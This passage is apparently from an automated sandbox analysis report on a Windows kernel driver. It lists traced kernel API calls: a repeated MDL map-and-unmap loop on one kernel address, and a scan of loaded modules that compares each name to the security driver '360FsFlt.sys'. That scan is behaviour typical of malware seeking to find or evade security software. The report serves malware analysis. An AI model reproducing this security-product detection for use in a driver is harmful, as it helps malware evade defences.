| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c78c560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c78c560, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c796560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c796560, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c797560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c797560, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b4458b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002cdbf560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002cdbf560, MemoryDescriptorList_unk = 0xffffe0003b4458b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b4458b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002d693560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002d693560, MemoryDescriptorList_unk = 0xffffe0003b4458b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000 |
Code Block #19 (EP #179)
»
| Information | Value |
|---|---|
| Trigger | PspSystemThreadStartup+0x3f |
| Start Address | 0xfffff800fc2ba230 |
Execution Path #179 (length: 510, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 510 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmIsAddressValid | VirtualAddress_ptr = 0xfffff80041962d10, ret_val_out = 1 |
| _wcsicmp | _String1 = ⴐ䆖ⴐ䆖, _String2 = 360FsFlt.sys, ret_val_out = 11485 |
| MmIsAddressValid | VirtualAddress_ptr = 0xfffff80041962d10, ret_val_out = 1 |
| _wcsicmp | _String1 = ⴐ䆖ⴐ䆖, _String2 = 360FsFlt.sys, ret_val_out = 11485 |
| MmIsAddressValid | VirtualAddress_ptr = 0xfffff80041962d10, ret_val_out = 1 |
| _wcsicmp | _String1 = ⴐ䆖ⴐ䆖, _String2 = 360FsFlt.sys, ret_val_out = 11485 |
| MmIsAddressValid | VirtualAddress_ptr = 0xfffff80041962d10, ret_val_out = 1 |
| _wcsicmp | _String1 = ⴐ䆖ⴐ䆖, _String2 = 360FsFlt.sys, ret_val_out = 11485 |
| MmIsAddressValid | VirtualAddress_ptr = 0xfffff80041962d10, ret_val_out = 1 |
| _wcsicmp | _String1 = ⴐ䆖ⴐ䆖, _String2 = 360FsFlt.sys, ret_val_out = 11485 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41ff88, ret_val_out = 1 |
| _wcsicmp | _String1 = ntoskrnl.exe, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41ff88, ret_val_out = 1 |
| _wcsicmp | _String1 = ntoskrnl.exe, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41ff88, ret_val_out = 1 |
| _wcsicmp | _String1 = ntoskrnl.exe, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41ff88, ret_val_out = 1 |
| _wcsicmp | _String1 = ntoskrnl.exe, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41ff88, ret_val_out = 1 |
| _wcsicmp | _String1 = ntoskrnl.exe, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41fd18, ret_val_out = 1 |
| _wcsicmp | _String1 = hal.dll, _String2 = 360FsFlt.sys, ret_val_out = 53 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41fd18, ret_val_out = 1 |
| _wcsicmp | _String1 = hal.dll, _String2 = 360FsFlt.sys, ret_val_out = 53 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41fd18, ret_val_out = 1 |
| _wcsicmp | _String1 = hal.dll, _String2 = 360FsFlt.sys, ret_val_out = 53 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41fd18, ret_val_out = 1 |
| _wcsicmp | _String1 = hal.dll, _String2 = 360FsFlt.sys, ret_val_out = 53 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41fd18, ret_val_out = 1 |
| _wcsicmp | _String1 = hal.dll, _String2 = 360FsFlt.sys, ret_val_out = 53 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41fba0, ret_val_out = 1 |
| _wcsicmp | _String1 = kdcom.dll, _String2 = 360FsFlt.sys, ret_val_out = 56 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41fba0, ret_val_out = 1 |
| _wcsicmp | _String1 = kdcom.dll, _String2 = 360FsFlt.sys, ret_val_out = 56 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41fba0, ret_val_out = 1 |
| _wcsicmp | _String1 = kdcom.dll, _String2 = 360FsFlt.sys, ret_val_out = 56 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41fba0, ret_val_out = 1 |
| _wcsicmp | _String1 = kdcom.dll, _String2 = 360FsFlt.sys, ret_val_out = 56 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41fba0, ret_val_out = 1 |
| _wcsicmp | _String1 = kdcom.dll, _String2 = 360FsFlt.sys, ret_val_out = 56 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41fa30, ret_val_out = 1 |
| _wcsicmp | _String1 = mcupdate.dll, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41fa30, ret_val_out = 1 |
| _wcsicmp | _String1 = mcupdate.dll, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41fa30, ret_val_out = 1 |
| _wcsicmp | _String1 = mcupdate.dll, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41fa30, ret_val_out = 1 |
| _wcsicmp | _String1 = mcupdate.dll, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41fa30, ret_val_out = 1 |
| _wcsicmp | _String1 = mcupdate.dll, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f8b0, ret_val_out = 1 |
| _wcsicmp | _String1 = werkernel.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f8b0, ret_val_out = 1 |
| _wcsicmp | _String1 = werkernel.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f8b0, ret_val_out = 1 |
| _wcsicmp | _String1 = werkernel.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f8b0, ret_val_out = 1 |
| _wcsicmp | _String1 = werkernel.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f8b0, ret_val_out = 1 |
| _wcsicmp | _String1 = werkernel.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f748, ret_val_out = 1 |
| _wcsicmp | _String1 = CLFS.SYS, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f748, ret_val_out = 1 |
| _wcsicmp | _String1 = CLFS.SYS, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f748, ret_val_out = 1 |
| _wcsicmp | _String1 = CLFS.SYS, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f748, ret_val_out = 1 |
| _wcsicmp | _String1 = CLFS.SYS, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f748, ret_val_out = 1 |
| _wcsicmp | _String1 = CLFS.SYS, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f5e0, ret_val_out = 1 |
| _wcsicmp | _String1 = tm.sys, _String2 = 360FsFlt.sys, ret_val_out = 65 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f5e0, ret_val_out = 1 |
| _wcsicmp | _String1 = tm.sys, _String2 = 360FsFlt.sys, ret_val_out = 65 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f5e0, ret_val_out = 1 |
| _wcsicmp | _String1 = tm.sys, _String2 = 360FsFlt.sys, ret_val_out = 65 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f5e0, ret_val_out = 1 |
| _wcsicmp | _String1 = tm.sys, _String2 = 360FsFlt.sys, ret_val_out = 65 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f5e0, ret_val_out = 1 |
| _wcsicmp | _String1 = tm.sys, _String2 = 360FsFlt.sys, ret_val_out = 65 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f470, ret_val_out = 1 |
| _wcsicmp | _String1 = PSHED.dll, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f470, ret_val_out = 1 |
| _wcsicmp | _String1 = PSHED.dll, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f470, ret_val_out = 1 |
| _wcsicmp | _String1 = PSHED.dll, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f470, ret_val_out = 1 |
| _wcsicmp | _String1 = PSHED.dll, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f470, ret_val_out = 1 |
| _wcsicmp | _String1 = PSHED.dll, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f310, ret_val_out = 1 |
| _wcsicmp | _String1 = BOOTVID.dll, _String2 = 360FsFlt.sys, ret_val_out = 47 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f310, ret_val_out = 1 |
| _wcsicmp | _String1 = BOOTVID.dll, _String2 = 360FsFlt.sys, ret_val_out = 47 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f310, ret_val_out = 1 |
| _wcsicmp | _String1 = BOOTVID.dll, _String2 = 360FsFlt.sys, ret_val_out = 47 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f310, ret_val_out = 1 |
| _wcsicmp | _String1 = BOOTVID.dll, _String2 = 360FsFlt.sys, ret_val_out = 47 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41f310, ret_val_out = 1 |
| _wcsicmp | _String1 = BOOTVID.dll, _String2 = 360FsFlt.sys, ret_val_out = 47 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e120, ret_val_out = 1 |
| _wcsicmp | _String1 = cmimcext.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e120, ret_val_out = 1 |
| _wcsicmp | _String1 = cmimcext.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e120, ret_val_out = 1 |
| _wcsicmp | _String1 = cmimcext.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e120, ret_val_out = 1 |
| _wcsicmp | _String1 = cmimcext.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e120, ret_val_out = 1 |
| _wcsicmp | _String1 = cmimcext.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41efb0, ret_val_out = 1 |
| _wcsicmp | _String1 = ntosext.sys, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41efb0, ret_val_out = 1 |
| _wcsicmp | _String1 = ntosext.sys, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41efb0, ret_val_out = 1 |
| _wcsicmp | _String1 = ntosext.sys, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41efb0, ret_val_out = 1 |
| _wcsicmp | _String1 = ntosext.sys, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41efb0, ret_val_out = 1 |
| _wcsicmp | _String1 = ntosext.sys, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41ee40, ret_val_out = 1 |
| _wcsicmp | _String1 = CI.dll, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41ee40, ret_val_out = 1 |
| _wcsicmp | _String1 = CI.dll, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41ee40, ret_val_out = 1 |
| _wcsicmp | _String1 = CI.dll, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41ee40, ret_val_out = 1 |
| _wcsicmp | _String1 = CI.dll, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41ee40, ret_val_out = 1 |
| _wcsicmp | _String1 = CI.dll, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41ecb8, ret_val_out = 1 |
| _wcsicmp | _String1 = msrpc.sys, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41ecb8, ret_val_out = 1 |
| _wcsicmp | _String1 = msrpc.sys, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41ecb8, ret_val_out = 1 |
| _wcsicmp | _String1 = msrpc.sys, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41ecb8, ret_val_out = 1 |
| _wcsicmp | _String1 = msrpc.sys, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41ecb8, ret_val_out = 1 |
| _wcsicmp | _String1 = msrpc.sys, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41eb38, ret_val_out = 1 |
| _wcsicmp | _String1 = FLTMGR.SYS, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41eb38, ret_val_out = 1 |
| _wcsicmp | _String1 = FLTMGR.SYS, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41eb38, ret_val_out = 1 |
| _wcsicmp | _String1 = FLTMGR.SYS, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41eb38, ret_val_out = 1 |
| _wcsicmp | _String1 = FLTMGR.SYS, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41eb38, ret_val_out = 1 |
| _wcsicmp | _String1 = FLTMGR.SYS, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e9c0, ret_val_out = 1 |
| _wcsicmp | _String1 = ksecdd.sys, _String2 = 360FsFlt.sys, ret_val_out = 56 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e9c0, ret_val_out = 1 |
| _wcsicmp | _String1 = ksecdd.sys, _String2 = 360FsFlt.sys, ret_val_out = 56 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e9c0, ret_val_out = 1 |
| _wcsicmp | _String1 = ksecdd.sys, _String2 = 360FsFlt.sys, ret_val_out = 56 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e9c0, ret_val_out = 1 |
| _wcsicmp | _String1 = ksecdd.sys, _String2 = 360FsFlt.sys, ret_val_out = 56 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e9c0, ret_val_out = 1 |
| _wcsicmp | _String1 = ksecdd.sys, _String2 = 360FsFlt.sys, ret_val_out = 56 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e830, ret_val_out = 1 |
| _wcsicmp | _String1 = clipsp.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e830, ret_val_out = 1 |
| _wcsicmp | _String1 = clipsp.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e830, ret_val_out = 1 |
| _wcsicmp | _String1 = clipsp.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e830, ret_val_out = 1 |
| _wcsicmp | _String1 = clipsp.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e830, ret_val_out = 1 |
| _wcsicmp | _String1 = clipsp.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e6b8, ret_val_out = 1 |
| _wcsicmp | _String1 = Wdf01000.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e6b8, ret_val_out = 1 |
| _wcsicmp | _String1 = Wdf01000.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e6b8, ret_val_out = 1 |
| _wcsicmp | _String1 = Wdf01000.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e6b8, ret_val_out = 1 |
| _wcsicmp | _String1 = Wdf01000.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e6b8, ret_val_out = 1 |
| _wcsicmp | _String1 = Wdf01000.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e530, ret_val_out = 1 |
| _wcsicmp | _String1 = WDFLDR.SYS, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e530, ret_val_out = 1 |
| _wcsicmp | _String1 = WDFLDR.SYS, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e530, ret_val_out = 1 |
| _wcsicmp | _String1 = WDFLDR.SYS, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e530, ret_val_out = 1 |
| _wcsicmp | _String1 = WDFLDR.SYS, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e530, ret_val_out = 1 |
| _wcsicmp | _String1 = WDFLDR.SYS, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e3c0, ret_val_out = 1 |
| _wcsicmp | _String1 = acpiex.sys, _String2 = 360FsFlt.sys, ret_val_out = 46 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e3c0, ret_val_out = 1 |
| _wcsicmp | _String1 = acpiex.sys, _String2 = 360FsFlt.sys, ret_val_out = 46 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e3c0, ret_val_out = 1 |
| _wcsicmp | _String1 = acpiex.sys, _String2 = 360FsFlt.sys, ret_val_out = 46 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e3c0, ret_val_out = 1 |
| _wcsicmp | _String1 = acpiex.sys, _String2 = 360FsFlt.sys, ret_val_out = 46 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a41e3c0, ret_val_out = 1 |
| _wcsicmp | _String1 = acpiex.sys, _String2 = 360FsFlt.sys, ret_val_out = 46 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b120, ret_val_out = 1 |
| _wcsicmp | _String1 = WppRecorder.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b120, ret_val_out = 1 |
| _wcsicmp | _String1 = WppRecorder.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b120, ret_val_out = 1 |
| _wcsicmp | _String1 = WppRecorder.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b120, ret_val_out = 1 |
| _wcsicmp | _String1 = WppRecorder.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b120, ret_val_out = 1 |
| _wcsicmp | _String1 = WppRecorder.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43bfc0, ret_val_out = 1 |
| _wcsicmp | _String1 = cng.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43bfc0, ret_val_out = 1 |
| _wcsicmp | _String1 = cng.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43bfc0, ret_val_out = 1 |
| _wcsicmp | _String1 = cng.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43bfc0, ret_val_out = 1 |
| _wcsicmp | _String1 = cng.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43bfc0, ret_val_out = 1 |
| _wcsicmp | _String1 = cng.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43be50, ret_val_out = 1 |
| _wcsicmp | _String1 = ACPI.sys, _String2 = 360FsFlt.sys, ret_val_out = 46 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43be50, ret_val_out = 1 |
| _wcsicmp | _String1 = ACPI.sys, _String2 = 360FsFlt.sys, ret_val_out = 46 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43be50, ret_val_out = 1 |
| _wcsicmp | _String1 = ACPI.sys, _String2 = 360FsFlt.sys, ret_val_out = 46 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43be50, ret_val_out = 1 |
| _wcsicmp | _String1 = ACPI.sys, _String2 = 360FsFlt.sys, ret_val_out = 46 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43be50, ret_val_out = 1 |
| _wcsicmp | _String1 = ACPI.sys, _String2 = 360FsFlt.sys, ret_val_out = 46 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43bcd0, ret_val_out = 1 |
| _wcsicmp | _String1 = WMILIB.SYS, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43bcd0, ret_val_out = 1 |
| _wcsicmp | _String1 = WMILIB.SYS, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43bcd0, ret_val_out = 1 |
| _wcsicmp | _String1 = WMILIB.SYS, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43bcd0, ret_val_out = 1 |
| _wcsicmp | _String1 = WMILIB.SYS, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43bcd0, ret_val_out = 1 |
| _wcsicmp | _String1 = WMILIB.SYS, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43bb50, ret_val_out = 1 |
| _wcsicmp | _String1 = WindowsTrustedRT.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43bb50, ret_val_out = 1 |
| _wcsicmp | _String1 = WindowsTrustedRT.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43bb50, ret_val_out = 1 |
